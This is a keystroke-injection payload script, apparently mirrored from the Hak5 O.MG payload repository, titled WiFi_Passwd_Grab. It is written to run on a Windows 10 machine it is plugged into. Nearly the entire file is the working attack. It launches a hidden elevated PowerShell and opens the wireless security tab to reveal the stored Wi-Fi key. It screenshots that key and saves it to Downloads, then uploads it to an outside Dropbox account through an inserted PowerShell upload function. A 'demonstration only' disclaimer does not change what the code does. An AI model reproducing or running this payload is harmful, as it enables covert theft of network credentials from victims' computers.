mirror of https://github.com/hak5/omg-payloads.git
97 lines
2.5 KiB
Plaintext
97 lines
2.5 KiB
Plaintext
REM_BLOCK
|
|
Title: WiFi_Passwd_Grab
|
|
Author: LulzAnarchyAnon
|
|
Description: This is a Three stage payload that begins by navagating to Network
|
|
Description: and Sharing Center. It then opens the wireless properties security
|
|
Description: tab, and makes the Network security key visible finally taking a screenshot.
|
|
Description: In the Second stage the screenshot is saved to the Downloads folder.
|
|
Description: In the Third, and final stage the screenshot is uploaded via Dropbox.
|
|
Target: Windows 10 PowerShell
|
|
Props: Darren Kitchen and I am Jakoby
|
|
Version: 1.0
|
|
Category: Exfiltration
|
|
|
|
This payload may need minor adjustments to run properly depending on
|
|
Attacker, and Target devices.
|
|
|
|
Check out I am Jakoby on Youtube to set up your DropBox for uploads.
|
|
|
|
THIS PAYLOAD IS FOR DEMONSTRATION PURPOSES ONLY, AND NOT INTENDED FOR MISUSE!
|
|
END_REM
|
|
|
|
DUCKY_LANG US
|
|
DELAY 2000
|
|
DEFAULT_DELAY 1000
|
|
|
|
REM Stage 1
|
|
|
|
GUI r
|
|
STRING powershell Start-Process PowerShell -verb runas -windowstyle hidden
|
|
ENTER
|
|
ALT Y
|
|
GUI r
|
|
STRING control.exe /name Microsoft.NetworkAndSharingCenter
|
|
ENTER
|
|
TAB
|
|
ENTER
|
|
TAB
|
|
ENTER
|
|
CTRL TAB
|
|
TAB
|
|
REPEAT 6 SHIFT TAB
|
|
SPACE
|
|
PRINTSCREEN
|
|
REPEAT 3 ALT F4
|
|
|
|
REM STAGE 2
|
|
|
|
GUI r
|
|
STRINGLN powershell -windowstyle hidden
|
|
STRINGLN mspaint
|
|
CTRL v
|
|
CTRL s
|
|
ALT d
|
|
STRINGLN %USERPROFILE%\Downloads
|
|
REPEAT 6 TAB
|
|
STRING wifipasswd
|
|
ALT s
|
|
ALT F4
|
|
|
|
REM STAGE 3
|
|
|
|
GUI r
|
|
STRINGLN powershell
|
|
STRINGLN function DropBox-Upload {
|
|
STRINGLN [CmdletBinding()]
|
|
STRINGLN param (
|
|
STRINGLN [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
|
|
STRINGLN [Alias("f")]
|
|
STRINGLN [string]$SourceFilePath
|
|
STRINGLN )
|
|
STRINGLN $DropBoxAccessToken = "$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN-HERE
|
|
STRINGLN "
|
|
STRINGLN $outputFile = Split-Path $SourceFilePath -leaf
|
|
STRINGLN $TargetFilePath="/$outputFile"
|
|
STRINGLN $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
|
|
STRINGLN $authorization = "Bearer " + $DropBoxAccessToken
|
|
STRINGLN $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
|
|
STRINGLN $headers.Add("Authorization", $authorization)
|
|
STRINGLN $headers.Add("Dropbox-API-Arg", $arg)
|
|
STRINGLN $headers.Add("Content-Type", 'application/octet-stream')
|
|
STRINGLN Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
|
|
STRINGLN }
|
|
GUI r
|
|
STRINGLN %USERPROFILE%\Downloads\
|
|
STRINGLN wifipasswd
|
|
GUI r
|
|
STRINGLN %USERPROFILE%\Downloads\
|
|
STRINGLN wifipasswd
|
|
ALT h
|
|
REPEAT 5 TAB
|
|
ENTER
|
|
ALT F4
|
|
CTRL v
|
|
STRINGLN | DropBox-Upload
|
|
ENTER
|
|
ALT F4
|
|
ENTER |